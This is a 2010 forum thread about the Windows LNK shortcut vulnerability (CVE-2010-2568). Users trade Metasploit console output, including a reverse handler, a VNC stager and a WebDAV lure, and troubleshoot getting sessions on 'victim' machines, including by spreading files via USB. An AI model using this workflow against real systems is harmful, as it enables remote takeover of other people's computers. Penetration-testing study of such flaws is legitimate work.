Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

  1. #1
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Lightbulb See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    I've posted a new blog about the Windows LNK vulnerability (CVE-2010-2568) and how you can protect yourself or customers against this vuln.

    Metasploit released an exploit for it in the newest revision.
    In the video i just show how to use the browser way but you can also put the files on a USB Stick and own you victim this way.
    Last edited by hardez; 03-24-2011 at 05:33 AM.

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Thread moved from beginner section to here.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Junior Member
    Join Date
    Apr 2008
    Posts
    36

    Default Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    autoplay feature is disabled by default in Windows 7 so with lnk file using desktop.ini doesn't work

    I tested this on two PCs with Win7

    win7 is vulnerable to this exploit but didn't work for me

  4. #4
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    I thought that this is the "new" and "dangerous" thing about this exploit that you don't need any autostart options 'cause Windows have a flaw in how it interprets the icon of the file!
    So that it's executed as soon as Windows trys to load the icon of the link!
    Last edited by hardez; 07-20-2010 at 07:49 PM.

  5. #5
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    12

    Default Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Excuse my noob-ness, but the original post indicates towards some files you can put on a USB stick to execute this vulnerability, where might one find such files? Or are they included with Metasploit and located somewhere in the Metasploit directory?

  6. #6
    Just burned his ISO ravbyte's Avatar
    Join Date
    Jul 2010
    Location
    Guatemala
    Posts
    20

    Default Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Quote Originally Posted by Radar_mX View Post
    autoplay feature is disabled by default in Windows 7 so with lnk file using desktop.ini doesn't work

    I tested this on two PCs with Win7

    win7 is vulnerable to this exploit but didn't work for me
    did you test on a win xp? Meaby you 're skip or you can be wrong doing some thing, i read the all windows 're vulnerable no matter if you or the OS disables the auto run from the external usb devices, regards.

    PS: Mods can i post a link with technical information? It' not of my authorship

  7. #7
    Junior Member
    Join Date
    Feb 2010
    Posts
    26

    Thumbs up

    Hi Hardez,
    (Great video)
    Just watched your video and tried to reproduce it but I i'm missing something.

    I can almost complete the exploit but it binds to my external card as an endpoint

    Code:
    meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=10.0.0.95 LPORT=4545)[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\mUCfWD.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 10.0.0.95:4545...
    So I tihnk the problem is that it is binding to my physical address and not to my vbox address

    So I changed the srvhost in options to 192.168.56.1
    but then I get
    Code:
    msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.56.1
    srvhost => 192.168.56.1
    msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job.
    
    [-] Handler failed to bind to 192.168.56.1:4444
    [-] Handler failed to bind to 0.0.0.0:4444
    [-] Exploit exception: The address is already in use (0.0.0.0:4444).
    Sorry if this is in the wrong section, but it was in the noobs section, and I know this is certainly a noob question so i'm not sure..... any help would be appreciated

    oh yes - I can open a vnc session no problems using the run one_vnc.rb exploit, so I guess I have the right software?

    cheers all

    Hi Hardez, Great video I just have a couple of questions - they are noob questions but since the video was moved here I'd still like to ask.

    I'm following the exploit but instead of launching the exploit and binding to my Vbox adapter the exploit listens on my physical adapter on a different subnet, so I can't trigger the vulnerability.

    I tried to change the srvhost in options but still no go!

    here's what I tried
    Code:
    msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.56.1:4444 [*] [*] Send vulnerable clients to \\10.0.0.95\KfTO\.[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk[*] [*] Using URL: http://0.0.0.0:80/[*]  Local IP: http://10.0.0.95:80/[*] Server started.
    So my question is howto change the local ip from 10.0.0.95:80 to 192.168.56.1:80?

    I really appreciate the video and any feedback it would probably help other noobs too.

    Also once the vuln is executed does that automatically start a vnc viewer like the one_vnc.rb exploit?
    from room362
    hxxp://www.room362.com/blog/month/december-2009

    cheers again
    Last edited by lupin; 07-21-2010 at 07:26 AM. Reason: Merging...

  8. #8
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    @Onemajorflaw no need to excuse
    like ravbyte said it doesn't matter wether you switch autostart on or off 'cause windows executes the exploit as soon as it finds the lnk file and thats in the moment you plug in the USB Drive.
    The Video and the Metasploit version of this exploit is designed for exploiting by WebDav but there is a version (the original one for example) that is designt for USB.
    I already asked HD Moore (coder of Metasploit) wether there will be a version for USB but he don't answered till now.

    But you can run the exploit, open the WebDav from within Backtrack and copy the files to USB the only thing you have do do is keep running msfconsole till someone connects.

    @andytof47
    What I understand is that you run Backtrack in a VM right? And the IP of BT is 192.168.56.1? But it binds to 10blabla?
    Is the Nic of the VM in bridged mode?
    If not do so cause else VMware/VirtualBox doing NAT and I don't know whether this works or not with Metasploit.

    To flaw #2 Metasploit can only bind one Port a session. So try another port like 4443 or restart metasploit then it should work

  9. #9
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    12

    Default

    Quote Originally Posted by hardez View Post
    @Onemajorflaw no need to excuse
    like ravbyte said it doesn't matter wether you switch autostart on or off 'cause windows executes the exploit as soon as it finds the lnk file and thats in the moment you plug in the USB Drive.
    The Video and the Metasploit version of this exploit is designed for exploiting by WebDav but there is a version (the original one for example) that is designt for USB.
    I already asked HD Moore (coder of Metasploit) wether there will be a version for USB but he don't answered till now.

    But you can run the exploit, open the WebDav from within Backtrack and copy the files to USB the only thing you have do do is keep running msfconsole till someone connects.
    Ah, I see! Thanks for the reply, it makes MUCH more sense to me now! I'm going to have to try this out once I get off of work. Thanks again.

    Sorry for the double post, but no one has been posting here!

    I successfully executed this exploit on a Windows 7 machine, but the only problem is a session is never opened. The lnk and dll file are opened on the victim PC, and on my BackTrack machine it shows someone connecting, and its shows the requests being sent, and recieved, but nothing happens after that. Any suggestions?
    Last edited by Archangel-Amael; 07-29-2010 at 11:07 AM.

  10. #10
    Just burned his ISO erdmaennchen's Avatar
    Join Date
    Jul 2010
    Posts
    15

    Default Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Actually this exploit is deceted by Microsoft Essentials and Avira Antivir. I just tested this two programs with the newest definitions.

    Without them the attack was succesfully.

Page 1 of 2 12 LastLast

Similar Threads

  1. Adobe Flash vuln from june 2010 CVE-2010-1297
    By hardez in forum Tutorials und Howtos
    Replies: 5
    Last Post: 09-14-2010, 08:54 AM
  2. Replies: 1
    Last Post: 06-14-2010, 10:05 AM
  3. Replies: 3
    Last Post: 04-14-2010, 08:29 PM
  4. Testing a exploit - connection but no action
    By wolf17 in forum OLD Pentesting
    Replies: 8
    Last Post: 09-22-2009, 01:03 AM
  5. Windows reboots- vulnerability?
    By Shaamaan in forum OLD General IT Discussion
    Replies: 8
    Last Post: 12-27-2007, 05:54 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •